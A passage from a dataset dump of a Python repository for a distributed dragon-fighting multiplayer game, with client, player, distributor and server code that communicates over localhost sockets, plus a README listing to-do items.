# Create a TCP/IP socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Connect the socket to the port where the server is listening\n server_address = ('localhost', port)\n print('Client connecting to {} port {}'.format(*server_address))\n # see if it is still up\n try:\n sock.connect(server_address)\n success = self.receive_grid(sock)\n return sock, success\n except ConnectionRefusedError:\n return sock, False\n\n def disconnect_server(self):\n \"\"\" disconnect from the server\"\"\"\n # close the socket\n try:\n self.sock.shutdown(socket.SHUT_WR)\n except:\n # lots of things can go wrong here, just catch them all\n pass\n\n def send_message(self, message):\n \"\"\" Send an message/action to the server\"\"\"\n # Send data\n print('sending {!r}'.format(message))\n try:\n # simulate latency\n time.sleep(self.latency/self.speedup)\n # then send the message\n self.sock.sendall(message.encode('utf-8'))\n return True\n except BrokenPipeError:\n return False\n\n def start_receiving(self):\n \"\"\"Thread for doing moves + send moves\"\"\"\n Thread(target=self.server_input, args=(self.queue,), daemon = True).start()\n\n def player_moves(self):\n \"\"\" User input function. \"\"\"\n while self.keep_alive:\n # First process server dataself.\n while not self.queue.empty():\n data = self.queue.get()\n #print( \"data from thread:\", data)\n if len(data) > 0:\n self.game.update_grid(data)\n # do something with row\n self.queue.task_done()\n\n message = \"\"\n # check if the player should disconnect based on playtime or when hp is low\n if self.life_time < (time.time() - self.start_time)*self.speedup or self.myplayer.hp <= 0:\n # Let the server know you want to disconnect\n print (\"DISCONNECTING player\", self.myplayer.ID)\n self.keep_alive = 0\n continue\n\n else:\n # This message should be created by an automated system (computer that plays game)\n time.sleep(1/self.speedup)\n\n # NOrmal order -> look for heals -> look for attacks -> MOve\n # Look for heals in space around me\n playerlist = []\n dragonlist = []\n for object in self.game.players.values():\n if isinstance(object, Player) and self.myplayer.get_distance(object) < 6:\n playerlist.append(object)\n elif isinstance(object, Dragon):\n dragonlist.append(object)\n\n if not dragonlist:\n print (\"Players won!\")\n self.keep_alive = 0\n\n for player in playerlist:\n if player.hp < 0.5*player.max_hp and player != self.myplayer:\n message = \"heal;{};{};end\".format(self.myplayer.ID, player.ID)\n break\n\n # Message unchanged , no healing done\n if message == \"\":\n for dragon in dragonlist:\n if self.myplayer.get_distance(dragon)<3:\n message = \"attack;{};{};end\".format(self.myplayer.ID, dragon.ID)\n break\n \n # message unchanged, no dragon in place\n if message == \"\":\n # Find the closest dragon\n min_dragon_distance = 60\n for dragon in dragonlist:\n if self.myplayer.get_distance(dragon) < min_dragon_distance:\n min_dragon_distance = self.myplayer.get_distance(dragon)\n min_dragon = dragon\n\n # move to this dragon.\n directions = []\n if (min_dragon.x-self.myplayer.x)<0:\n directions.append(\"left\")\n elif (min_dragon.x-self.myplayer.x)>0:\n directions.append(\"right\")\n elif (min_dragon.y-self.myplayer.y)<0:\n directions.append(\"down\")\n elif (min_dragon.y-self.myplayer.y)>0:\n directions.append(\"up\")\n message = \"move;{};{};end\".format(self.myplayer.ID, np.random.choice(directions))\n\n #message = \"Debug message;, time=\" + str(time.time() - self.start_time)\n message_send = self.send_message(message)\n if not message_send:\n print(\"Server went down, look for new one\")\n\n retries = 0\n max_retries = 5\n while retries < max_retries:\n server_port = self.get_server(self.distr_port)\n if server_port == 0:\n # set max_retries to stop searching, because there is no distributor\n retries = max_retries\n else:\n # try and connect to the given server\n self.sock, found = self.connect_server(port=server_port)\n # if given server was not valid, try for another\n if not found:\n retries += 1\n else:\n # server was good, start communicating\n self.queue = Queue()\n self.start_receiving()\n # found one, stop searching\n retries = max_retries\n # do not let the client play a game if there is no game\n if server_port == 0:\n # no distributor up and running\n self.keep_alive = False\n\n self.disconnect_server()\n\n def server_input(self, queue):\n \"\"\" Check for server input. \"\"\"\n while (self.life_time == None) or (self.life_time > (time.time() - self.start_time)*self.speedup):\n try:\n readable, writable, errored = select.select([self.sock], [], [])\n\n data = b''\n while True:\n data += self.sock.recv(64)\n # simulate latency\n time.sleep(self.latency/self.speedup)\n # update my update_grid\n if data[-9:] == b'endupdate':\n break\n\n for item in data[:-9].decode('utf-8').split('end'):\n queue.put(item)\n #print (\"message: incomming \" + data.decode('utf-8'))\n except:\n # lots of things can go wrong here, just catch them all\n break\n\n\n\nif __name__ == \"__main__\":\n import sys\n distr_port = int(sys.argv[1])\n play_time = int(sys.argv[2])\n lat = int(sys.argv[3])\n lng = int(sys.argv[4])\n\n # Connect to the host\n c = Client(distr_port=distr_port, demo=False, life_time=play_time, lat=lat, lng=lng)\n print(\"Created client process\")\n if c.joined_game:\n # Receive input from servers\n c.start_receiving()\n # let the client do moves until its playtime is up\n c.player_moves()\n\n # remove the player from the server\n c.disconnect_server()\n time.sleep(2) #Need a timing here, to prevent too quick shutdown\n print(\"Closing client process connected to server on port \" +str(c.port))\n else:\n print(\"No game available, try again later :(\")\n"
},
{
"alpha_fraction": 0.47940200567245483,
"alphanum_fraction": 0.49401992559432983,
"avg_line_length": 31.365591049194336,
"blob_id": "5369537c954827c12f01bb9e21f22cf136eb8f61",
"content_id": "9aab45639baa81900a55e1d600b138989a636957",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3010,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 93,
"path": "/Player.py",
"repo_name": "neverbeam/distributed-systems",
"src_encoding": "UTF-8",
"text": "import random\n\nclass User:\n\n def __init__(self, ID, x, y, game):\n self.ID = ID\n self.x = x\n self.y = y\n self.game = game\n self.maxrange = 2\n\n def attack(self, victim):\n \"\"\" Attack another player and remove if they have no hp left.\"\"\"\n distance = self.get_distance(victim)\n\n if distance > self.maxrange:\n print(\"Error: Attack not valid! Distance is greater than max.\")\n return 0\n else:\n print(\"Victim {} hp: {}\".format(victim.ID, victim.hp))\n victim.hp -= self.ap\n print(\"Victim {} hp: {}\".format(victim.ID, victim.hp))\n if victim.hp <= 0:\n print(\"player {} is dead! Remove victim from game.\".format(victim.ID))\n self.game.remove_player(victim)\n return 1\n\n\n def get_distance(self, victim):\n return (abs(self.x - victim.x) + abs(self.y - victim.y))\n\n\nclass Dragon(User):\n\n def __init__(self, ID, x, y, game):\n User.__init__(self, ID, x, y, game)\n self.type = \"Dragon\"\n self.max_hp = random.randint(50,100)\n self.ap = random.randint(5,20)\n self.hp = self.max_hp\n self.maxrange = 5\n\nclass Player(User):\n\n def __init__(self, ID, x, y, game):\n User.__init__(self, ID, x, y, game)\n self.type = \"Player\"\n self.max_hp = random.randint(10,20)\n self.ap = random.randint(1,10)\n self.hp = self.max_hp\n\n def move_player(self, direction):\n \"\"\" Move the player in the right direction. \"\"\"\n if direction == \"up\":\n if self.y == self.game.height-1 or self.game.map[self.y+1][self.x] != \"*\":\n print(\"Error: Invalid move! cannot move up\")\n return 0\n else:\n self.y += 1\n return 1\n elif direction == \"down\":\n if self.y == 0 or self.game.map[self.y-1][self.x] != \"*\":\n print(\"Error: Invalid move! Cannot move down\")\n return 0\n else:\n self.y -= 1\n return 1\n elif direction == \"left\":\n if self.x == 0 or self.game.map[self.y][self.x-1] != \"*\":\n print(\"Error: Invalid move! Cannot move left\")\n return 0\n else:\n self.x -= 1\n return 1\n elif direction == \"right\":\n if self.x == self.game.width-1 or self.game.map[self.y][self.x+1] != \"*\":\n print(\"Error: Invalid move! Cannot move right\")\n return 0\n else:\n self.x += 1\n return 1\n\n def heal_player(self, player):\n \"\"\" heal another player. \"\"\"\n distance = self.get_distance(player)\n\n if distance > 5:\n print(\"Error: Healing failed! Distance is greater than 5.\")\n return 0\n else:\n heal_amount = min(self.ap, player.max_hp - player.hp)\n player.hp += heal_amount\n return 1\n"
},
{
"alpha_fraction": 0.7551928758621216,
"alphanum_fraction": 0.7596439123153687,
"avg_line_length": 29.636363983154297,
"blob_id": "a91a48347c128920feb6ecaafb2fe14573519272",
"content_id": "c105c5820686283a62f13cf830aa73d21767012f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 674,
"license_type": "no_license",
"max_line_length": 151,
"num_lines": 22,
"path": "/README.md",
"repo_name": "neverbeam/distributed-systems",
"src_encoding": "UTF-8",
"text": "# distributed-systems\nDistributed systems Das game\n\n\nToDo:\n- More parse functions\n- Disconnect etc functionality in server (Martijn, fixed)\n- Thread locking clients if ctrl + c -- FIX issue(Martijn, fixed)\n- regex for parse functions of client input (not neccesary, skipped)\n- game ticks\n- correctness check of commands\n\nLater:\n- Population server\n- Several server and sync\n- How to deal with disconnects\n\n\nissues:\n- Server_input -> select in while loop is blocking, so could be that self.keep_alive change is not parsed very fast. (possible fix, game tick timeout?)\n\n- Populator:If with no else line number 102. str(name_i) was not updated, changed it to i for time being.\n"
},
{
"alpha_fraction": 0.45249950885772705,
"alphanum_fraction": 0.45901167392730713,
"avg_line_length": 45,
"blob_id": "af5e43aed8d12fb259e2f05ed50686f33606651c",
"content_id": "514110573f8fc11c6cf6d88cfce94ae5f21e250d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10442,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 227,
"path": "/distributor.py",
"repo_name": "neverbeam/distributed-systems",
"src_encoding": "UTF-8",
"text": "import socket\nimport select\nimport random\nimport time\nimport math\nimport numpy as np\nimport os\nimport sys\n\nclass Distributor:\n def __init__(self, port=11000, life_time=1100, speedup=1, printing=True):\n # setup communication on this port\n self.own_port = port\n self.life_time = life_time\n self.start_time = time.time()\n self.speedup = speedup\n # do not print to terminal for experiments\n self.printing = printing\n if not self.printing:\n sys.stdout = open(os.devnull, 'w')\n # list of active game servers\n self.servers = []\n self.init_socket()\n # this only for experiments\n self.latencies = []\n\n # initialize the socket to listen to on own_port\n def init_socket(self):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Bind the socket to the port\n dist_address = ('localhost', self.own_port)\n print('Distributor starting up on {} port {}'.format(*dist_address))\n self.sock.bind(dist_address)\n # allow 10 connections at the same time, so that they wait for eachother\n self.sock.listen(10)\n\n def power_down(self):\n \"\"\" Close down the distributor. \"\"\"\n self.sock.close()\n if len(self.latencies) > 0:\n print(\"latencies are: \", self.latencies)\n print(\"Mean latency: \", np.mean(self.latencies))\n print(\"Standard deviation latency\", np.std(self.latencies))\n\n # add a server port to the server list\n def add_server(self, server_port, peer_port, lat, lng):\n # each server has a port, player number (TODO and location)\n server = [server_port, peer_port, lat, lng, 0]\n self.servers.append(server)\n\n # remove a server from the server list\n def remove_server(self, server_port):\n for i in range(len(self.servers)):\n if self.servers[i][0] == server_port:\n self.servers.pop(i)\n break\n\n # look for the best server port for a new player\n def add_player(self, lat, lng):\n best_server = None\n best_distance_players = None\n # check all known servers\n for server in self.servers:\n # get the euclidean distance\n distance = math.sqrt((server[2] - lat)**2 + (server[3] - lng)**2)\n players = server[4]+1\n # find the server with the lowest number of players * distance (is on index 2)\n if best_server == None or best_distance_players > (players*(distance+0.1)):\n best_server = server\n best_distance_players = players*(distance+0.1)\n\n # set it, but also get the player number dynamicly by communicating with servers\n best_server[4] += 1 # add 1 to the servers player count\n # prevent errors, but report on the closest server\n best_distance = 0 if best_distance_players == None else best_distance_players/(best_server[4])\n\n # send the player to the best server on the client port\n return best_server[0], best_distance\n\n def update_player_total(self, server_port, new_player_total):\n the_server = None\n # check all known servers\n for server in self.servers:\n # find the server with the matching port\n if server[0] == server_port:\n the_server = server\n break\n\n print(\"Server on port \", the_server[0], \"players=\", the_server[4], \"->\", new_player_total)\n the_server[4] = new_player_total\n\n\n # run this as a daemon to receive player join requests\n def read_ports(self):\n \"\"\" Read the sockets for new connections or player noticeses.\"\"\"\n self.sock.settimeout(1/self.speedup)\n while (self.life_time == None) or (self.life_time > (time.time() - self.start_time)*self.speedup):\n try:\n # open up a new socket to communicate with this messager\n conn, addr = self.sock.accept()\n with conn:\n while True:\n data = conn.recv(1024)\n if not data:\n break\n message = data.decode('utf-8')\n\n # check for client connection to send him to a server\n if message.startswith('CLIENT|'):\n client_data = message.split(\"|\")\n if len(client_data) != 2:\n # ill defined message\n pass\n else:\n # get the latitude and longitude of the client from the message\n lat_lng = client_data[1].split(\";\")\n lat = float(lat_lng[0])\n lng = float(lat_lng[1])\n if len(self.servers) > 0:\n # get the best server for this player\n server_port, distance = self.add_player(lat, lng)\n distance_str = \"{:.4f}\".format(distance)\n self.latencies.append(distance)\n # send this server port to the client\n ret_mess = ('DIST|' + str(server_port) + \"|\" + distance_str).encode('UTF-8')\n conn.sendall(ret_mess)\n else:\n # TODO start up a server\n conn.sendall(b'NO_SERVER')\n\n # check for server message about its player total\n elif message.startswith('SERVER|'):\n server_stats = message.split(\"|\")\n if len(server_stats) != 3:\n # ill defined message\n pass\n else:\n try:\n # get the servers, so we know which one it is\n server_port = int(server_stats[1])\n # set the given player total\n new_player_total = int(server_stats[2])\n self.update_player_total(server_port, new_player_total)\n except ValueError:\n # message was not an integer\n pass\n\n # handles the first message of a new server\n elif message.startswith('NEW_SERVER|'):\n new_server_mess = message.split(\"|\")\n if len(new_server_mess) != 4:\n # ill defined mdist\n pass\n else:\n try:\n # get the client port and peer port of the server\n new_server_port = int(new_server_mess[1])\n new_server_peer_port = int(new_server_mess[2])\n\n # send back the peers that the server has\n ret_mess = 'DIST'\n if len(self.servers) == 0:\n # has no peers yet so let server know that he has to start the game\n ret_mess += '|NO_PEERS'\n else:\n for server in self.servers:\n # the peer server ports are saved at index 1\n peer_server_port = server[1]\n ret_mess += '|' + str(peer_server_port)\n ret_mess = ret_mess.encode('UTF-8')\n conn.sendall(ret_mess)\n\n # get the latitude and longitude of the server from the message\n lat_lng = new_server_mess[3].split(\";\")\n lat = float(lat_lng[0])\n lng = float(lat_lng[1])\n\n # add the server to the lists\n self.add_server(new_server_port, new_server_peer_port, lat, lng)\n except ValueError:\n # message was not an integer\n pass\n\n # check for server message about him stopping\n elif message.startswith('OUT_SERVER|'):\n server_stats = message.split(\"|\")\n if len(server_stats) != 2:\n # ill defined message\n pass\n else:\n try:\n # remove the server\n server_port = int(server_stats[1])\n self.remove_server(server_port)\n print(\"Distributor removed server, updated = \", self.servers)\n except ValueError:\n # message was not an integer\n pass\n else:\n # junk message\n pass\n\n\n # Handling stopping distributor\n except KeyboardInterrupt:\n # self.power_down()\n break\n\n # no message in set timeout, try again\n except socket.timeout:\n pass\n\n # always power down for right now\n print(\"Distributor shutting down\")\n self.power_down()\n\n\nif __name__ == '__main__':\n import sys\n listen_port = int(sys.argv[1])\n run_time = int(sys.argv[2])\n d = Distributor(port=listen_port, life_time=run_time)\n print(\"Created distributor process \" + str(listen_port))\n # let the distributor listen to all incoming messages until lifetime is up\n d.read_ports()\n print(\"Distributor closed on port \" + str(listen_port))\n"
},
{
"alpha_fraction": 0.5139873027801514,
"alphanum_fraction": 0.5255501866340637,
"avg_line_length": 28.788888931274414,
"blob_id": "54516d3d90be53f617605517ace59f12d515f79d",
"content_id": "f6607c89388acba4582fd0eb7ec48c18dbfca7dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2681,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 90,
"path": "/PlayerV2.py",
"repo_name": "neverbeam/distributed-systems",
"src_encoding": "UTF-8",
"text": "\"\"\"\n-- Player Control --\nDate Created: 3 December 2018\n\"\"\"\n\nimport random\n\nclass Player:\n\n # Constant Variables\n MIN_USER_AP = 1\n MAX_USER_AP = 10\n MIN_USER_HP = 10\n MAX_USER_HP = 20\n MIN_DRAGON_AP = 5\n MAX_DRAGON_AP = 20\n MIN_DRAGON_HP = 50\n MAX_DRAGON_HP = 100\n MAX_HEAL_DIST = 5\n MAX_ATT_DIST = 2\n\n def __init__(self, ID, type, x, y):\n self.ID = ID\n self.type = type\n self.x = x\n self.y = y\n if type == 'user':\n self.max_hp = random.randint(MIN_USER_HP,MAX_USER_HP)\n self.ap = random.randint(MIN_USER_AP,MAX_USER_AP)\n self.hp = max_hp\n elif type == 'dragon':\n self.hp = random.randint(MIN_DRAGON_HP,MAX_DRAGON_HP)\n self.ap = random.randint(MIN_DRAGON_AP,MAX_DRAGON_AP)\n\n def get_distance(player):\n return math.abs(self.x - player.x) + math.abs(self.y - player.y)\n\n def attack_player(victim):\n distance = get_distance(victim)\n\n if distance > MAX_ATT_DIST:\n print(\"Error: Attack not valid! Distance is grater than 2.\")\n else:\n victim.hp -= self.ap\n if victim.hp <= 0:\n print(\"Victim is dead! Remove victim from game.\")\n\n def heal_player(player):\n distance = get_distance(player)\n\n if distance > MAX_HEAL_DIST:\n print(\"Error: Healing invalid! Distance is greater than 5.\")\n\n if player.type == 'dragon':\n print(\"Error: Healing invalid! Cannot heal a dragon.\")\n else:\n heal_amount = self.ap\n player.hp += heal_amount\n\n if player.hp >= player.max_hp:\n player.hp = player.max_hp\n\n def move_player(direction):\n\n if direction == \"up\":\n if self.y == board.height:\n print(\"Error: Invalid move! Cannot move up, player on the edge.\")\n else:\n self.y += 1\n elif direction == \"down\":\n if self.y == 0:\n print(\"Error: Invalid move! Cannot move down, player on the edge.\")\n else:\n self.y -= 1\n elif direction == \"left\":\n if self.x == 0:\n print(\"Error: Invalid move! Cannot move left, player on the edge.\")\n else:\n self.x -= 1\n elif direction == \"right\":\n if self.x == board.width:\n print(\"Error: Invalid move! Cannot move right, player on the edge.\")\n else:\n self.x += 1\n\n def connect_player():\n \"\"\"A function to connect a player to a game\"\"\"\"\n\n def disconnect_player():\n \"\"\"A function to disconnect player from a game\"\"\"\n"
},
{
"alpha_fraction": 0.49412769079208374,
"alphanum_fraction": 0.5019004940986633,
"avg_line_length": 41.806217193603516,
"blob_id": "2d5ae4294962dcce4e4f484f24706cfe8b43a10c",
"content_id": "394a84d09312aec7ddbb6ab2003dd07597c08a43",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 23415,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 547,
"path": "/server.py",
"repo_name": "neverbeam/distributed-systems",
"src_encoding": "UTF-8",
"text": "import socket\nimport select\nimport random\nimport time\nfrom Game import *\nfrom queue import Queue, Empty\nfrom threading import Thread\nimport os\nimport sys\n\n\nclass Server:\n def __init__(self, port=10000, peer_port=10100, life_time=None, check_alive=1, ID=0, lat=1, lng=1, num_dragons=1, speedup=1.0, printing=True):\n # we could also place object on a 25x25 grid\n self.port = port\n self.peer_port = peer_port\n self.lat = lat\n self.lng = lng\n self.life_time = life_time\n self.start_time = time.time()\n self.speedup = speedup\n # do not print to terminal for experiments\n self.printing = printing\n if not self.printing:\n sys.stdout = open(os.devnull, 'w')\n self.check_alive = check_alive\n self.tickdata = b''\n self.game_started = False\n self.game = Game(self, ID,2,1)\n self.ID_connection = {}\n self.server_queue = Queue()\n self.peer_queue = Queue()\n filename = 'logfile{}'.format(self.game.ID)\n self.log = open(filename,'w')\n\n self.start_up(num_dragons, port, peer_port)\n\n\n\n def start_up(self, num_dragons, port=10000, peer_port=10100):\n \"\"\" Create an server for das game. Each server will maintain a number of dragons.\"\"\"\n # Create a TCP/IP socket\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n found_free_port = False\n while not found_free_port:\n try:\n server_address = ('localhost', self.port)\n self.sock.bind(server_address)\n print('Server starting up on {} port {}'.format(*server_address))\n found_free_port = True\n self.connections = [self.sock]\n except OSError:\n print(\"Given server port was in use, trying similar...\")\n self.port += 10000\n if self.port >= 100000:\n raise OSError('Cant find a suitable server port.')\n\n # create the set number of dragons for this server\n self.dragonlist = []\n for i in range(int(num_dragons)):\n self.create_dragon()\n # if number was float, give the residual a chance to become a dragon\n # meaning: 3.2 has a 20% chance of creating a 4th dragon\n if random.random() < (num_dragons%1):\n self.create_dragon()\n\n # Listen for incoming connections\n self.sock.listen(30)\n\n # FOR PEERS\n # Create a TCP/IP socket\n self.peer_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Bind the socket to the port\n found_free_port = False\n while not found_free_port:\n try:\n server_peer_address = ('localhost', self.peer_port)\n self.peer_sock.bind(server_peer_address)\n print('Peer server starting up on {} port {}'.format(*server_peer_address))\n found_free_port = True\n self.peer_connections = [self.peer_sock]\n except OSError:\n print(\"Given peer port was in use, trying similar...\")\n self.peer_port += 10000\n if self.peer_port >= 100000:\n raise OSError('Cant find a suitable peer port.')\n\n # Listen for incoming connections\n self.peer_sock.listen(4)\n\n\n def receive_grid(self, peer_socket):\n \"\"\" Receive the current state of the grid from the server. \"\"\"\n data = \"\"\n # Keep receiving until an end has been send. TCP gives in order arrival\n while True:\n data += peer_socket.recv(128).decode('utf-8')\n if data[-3:] == \"end\":\n break\n\n #Parse the data so that the user contains the whole grid.\n # type, ID, x, y, hp , ap,\n data = data[:-3].split(\";\")\n del data[-1]\n for i in range(0, len(data), 6):\n playerdata = data[i:i+6]\n if playerdata[0] == \"Player\":\n player = Player(playerdata[1], int(playerdata[2]), int(playerdata[3]) ,self.game)\n player.hp = int(playerdata[4])\n player.ap = int(playerdata[5])\n\n elif playerdata[0] == \"Dragon\":\n player = Dragon(playerdata[1], int(playerdata[2]), int(playerdata[3]) ,self.game)\n player.hp = int(playerdata[4])\n player.ap = int(playerdata[5])\n\n self.game.add_player(player)\n\n #print ( \"Server succesfully received grid \")\n\n def tell_distributor(self, distr_port):\n \"\"\"tell the distributor you exist, and get back list of your peers, and connect with peers\"\"\"\n self.distr_port = distr_port\n\n # create socket for single communication with distributor\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n # send a message to the distributor\n lat_str = \"{:.4f}\".format(self.lat)\n lng_str = \"{:.4f}\".format(self.lng)\n join_mess = 'NEW_SERVER|' + str(self.port) + '|' + str(self.peer_port) + \\\n '|' + lat_str + ';' + lng_str\n send_mess = (join_mess).encode('UTF-8')\n s.connect(('localhost', self.distr_port))\n s.sendall(send_mess)\n # get a peer server port back from the distributor\n data = s.recv(1024)\n\n message = data.decode('utf-8')\n if message.startswith('DIST|'):\n dist_mess = message.split(\"|\")\n if len(dist_mess) < 2:\n # ill defined message\n pass\n else:\n # the other parts of the message are his peers ports\n for i in range(1, len(dist_mess)):\n try:\n peer_port = int(dist_mess[i])\n # create a new socket for this peer\n peer_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # Connect the socket to the port where the server is listening\n peer_address = ('localhost', peer_port)\n print('Peer connecting to {} port {}'.format(*peer_address))\n peer_socket.connect(peer_address)\n self.peer_connections.append(peer_socket)\n\n if i == len(dist_mess)-1:\n peer_socket.send(b'getgrid')\n self.receive_grid(peer_socket)\n\n except ValueError:\n # message was not an integer\n pass\n # now start listening on the peer ports\n self.start_peer_receiving()\n\n\n def create_dragon(self):\n \"\"\" Create a dragon on the battlefield and send dragon to other all players. \"\"\"\n x = random.randint(0,25)\n y = random.randint(0,25)\n dragon = Dragon(str(self.game.ID), x,y, self.game)\n message = \"{};addeddragon;{};{};{};{};{};end\".format(time.time(),dragon.ID, dragon.x, dragon.y, dragon.hp, dragon.ap)\n self.tickdata += message.encode(\"utf-8\")\n self.game.add_player(dragon)\n self.dragonlist.append(dragon)\n self.game.ID += 1\n\n def dragon_moves(self):\n \"\"\" Let the server create moves for the dragons. \"\"\"\n message = \"\"\n # If dragon has died, remove it from server.\n dragonlist = []\n for dragon in self.dragonlist:\n if dragon.hp > 0:\n dragonlist.append(dragon)\n self.dragonlist = dragonlist\n\n # Look for player around me\n for dragon in self.dragonlist:\n playerlist = []\n for object in self.game.players.values():\n if isinstance(object, Player) and dragon.get_distance(object) < 5:\n playerlist.append(object)\n\n # randomly select one of the players\n if playerlist:\n message += \"{};attack;{};{};end\".format(time.time(),dragon.ID, random.choice(playerlist).ID)\n\n return message\n\n\n\n def power_down(self):\n \"\"\" Close down the server. \"\"\"\n for connection in self.connections[1:]:\n connection.close()\n # tell the distributor youre stopping\n # create socket for single communication with distributor\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n # send a message to the distributor\n send_mess = ('OUT_SERVER|' + str(self.port)).encode('UTF-8')\n try:\n s.connect(('localhost', self.distr_port))\n s.sendall(send_mess)\n except ConnectionRefusedError:\n pass\n\n def peer_power_down(self):\n \"\"\"close peer connections. \"\"\"\n for peer_connection in self.peer_connections[1:]:\n try:\n peer_connection.shutdown(socket.SHUT_WR)\n except OSError:\n print(\"Peer socket already closed.\")\n\n def broadcast_clients(self, data):\n \"\"\" Broadcast the message from 1 client to other clients\"\"\"\n # Send data to other clients\n for clients in self.connections[1:]:\n clients.sendall(data)\n\n def broadcast_servers(self, data):\n \"\"\" Broadcast the message to other servers\"\"\"\n # Send data to other clients\n for server in self.peer_connections[1:]:\n try:\n server.sendall(data)\n except ConnectionResetError:\n print(\"This peer got removed \", str(server))\n except BrokenPipeError:\n print(\"This peer game ended \", str(server))\n\n def send_grid(self, client, theirplayerID):\n \"\"\"Send the grid to new players or new server\"\"\"\n\n for player in self.game.players.values():\n if player.ID == theirplayerID:\n data = \"{};{};{};{};{};{};\".format(\"Myplayer\", player.ID, player.x, player.y, player.hp, player.ap)\n else:\n data = \"{};{};{};{};{};{};\".format( player.type, player.ID, player.x, player.y, player.hp, player.ap)\n client.sendall(data.encode('utf-8'))\n # Send ending character\n client.sendall(b\"end\")\n #print(\"finished sending grid\")\n\n def send_grid_server(self, server):\n \"\"\"Send the grid to a new server\"\"\"\n\n for player in self.game.players.values():\n data = \"{};{};{};{};{};{};\".format( player.type, player.ID, player.x, player.y, player.hp, player.ap)\n server.sendall(data.encode('utf-8'))\n # Send ending character\n server.sendall(b\"end\")\n #print(\"finished sending grid to SERVER\")\n\n def create_player(self, client):\n \"\"\"Create a player and message this to every body else.\"\"\"\n # Make sure that new player doesn't spawn on old player\n while True:\n x = random.randint(0,25)\n y = random.randint(0,25)\n if self.game.map[y][x] == \"*\":\n break\n\n player = Player(str(self.game.ID), x, y, self.game)\n self.ID_connection[client] = player\n self.game.ID += 1\n self.game.add_player(player)\n self.send_grid(client, player.ID)\n\n # Send data to other clients\n message = \"{};join;{};{};{};{};{};end\".format(time.time(),player.ID, player.x, player.y, player.hp, player.ap)\n self.tickdata += message.encode(\"utf-8\")\n\n def remove_client(self, client):\n \"\"\" Removing client if disconnection happens\"\"\"\n player = self.ID_connection[client]\n playerID = player.ID\n\n if player.hp > 0:\n #self.game.remove_player(player)\n message = \"{};leave;{};end\".format(time.time(), playerID)\n self.tickdata += message.encode(\"utf-8\")\n\n self.connections.remove(client)\n print(\"connection closed\")\n\n def remove_peer(self, peer):\n \"\"\" Removing peer if shutdown happens\"\"\"\n self.peer_connections.remove(peer)\n print(\"Peer connection closed\")\n\n\n def read_ports(self):\n \"\"\" Read the sockets for new connections or player noticeses.\"\"\"\n log = self.log\n\n self.time_out = self.check_alive\n # Game ticks at whole seconds\n\n game_ended = False\n while (self.life_time == None) or (self.life_time > (time.time() - self.start_time)*self.speedup):\n try:\n # Wait for a connection, based on actual seconds\n # dont sync on whole seconds, but whole second/speedup\n self.time_out = int(time.time()*self.speedup) + 1 - time.time()*self.speedup\n readable, writable, errored = select.select(self.connections, [], [], self.time_out/self.speedup)\n\n # check for a game end scenario, where either all players or dragons are dead\n if self.game_started:\n client_total = 0\n dragon_total = 0\n for object in self.game.players.values():\n if isinstance(object, Player):\n client_total += 1\n elif isinstance(object, Dragon):\n dragon_total += 1\n # make sure you havent ended the game already\n if not game_ended:\n # if either is 0, send message to peers and set life time to 10\n # 10 means sending the message 10 more times, then shut down\n if client_total == 0:\n print(\"DRAGONS WIN THE GAME\")\n log.write(\"WIN DRAGONS\" + '\\n')\n self.life_time = 10\n self.broadcast_servers(b'WIN DRAGONS')\n game_ended = True\n elif dragon_total == 0:\n print(\"PLAYERS WIN THE GAME\")\n log.write(\"WIN PLAYERS\" + '\\n')\n self.life_time = 10\n self.broadcast_servers(b'WIN PLAYERS')\n game_ended = True\n print(\"Clients:\", client_total, \"Dragons:\", dragon_total)\n\n # update the peer connections for the main process\n while not self.peer_queue.empty():\n data = self.peer_queue.get()\n if data[0] == 'getgrid':\n self.send_grid_server(data[1])\n self.peer_queue.task_done()\n # make sure you havent ended the game already\n elif not game_ended:\n if (data == b'WIN PLAYERS'):\n print(\"PLAYERS WIN THE GAME (told by other server)\")\n log.write(\"WIN PLAYERS\" + '\\n')\n self.life_time = 10\n game_ended = True\n elif (data == b'WIN DRAGONS'):\n print(\"DRAGONS WIN THE GAME (told by other server)\")\n log.write(\"WIN DRAGONS\" + '\\n')\n self.life_time = 10\n game_ended = True\n else:\n peer_connection = data[0]\n if peer_connection not in self.peer_connections:\n self.peer_connections.append(peer_connection)\n self.peer_queue.task_done()\n\n if not readable and not writable and not errored:\n # timeout is reached, just send player total to the distributor\n # create socket for single communication with distributor\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n # send a message to the distributor\n send_mess = ('SERVER|' + str(self.port) + '|' + str(len(self.connections)-1)).encode('UTF-8')\n try:\n s.connect(('localhost', self.distr_port))\n s.sendall(send_mess)\n except ConnectionRefusedError:\n pass\n print(\"No message received\")\n\n\n # Make some dragon moves.\n dragon_data = self.dragon_moves()\n if dragon_data:\n self.tickdata += (dragon_data).encode('utf-8')\n\n # Always send a message, just send test message if nothing need to ben synced.\n if self.tickdata:\n self.broadcast_servers(self.tickdata)\n else:\n self.broadcast_servers(b\"test\")\n\n\n # Change to num_server - 1\n server_count = 1 # Own peer also in list\n while not server_count == len(self.peer_connections):\n try:\n data = self.server_queue.get(block=True, timeout=0.1/self.speedup)\n if data == b'test':\n pass\n else:\n self.tickdata += data\n self.server_queue.task_done()\n except Empty:\n print(\"Late response from peer\")\n server_count += 1\n\n # Sort the data\n data = self.tickdata.decode('utf-8')\n if data:\n data = data.split(\"end\")[:-1] # Last end will give a empty index\n\n # Parse data\n data = sorted(data, key=lambda x: 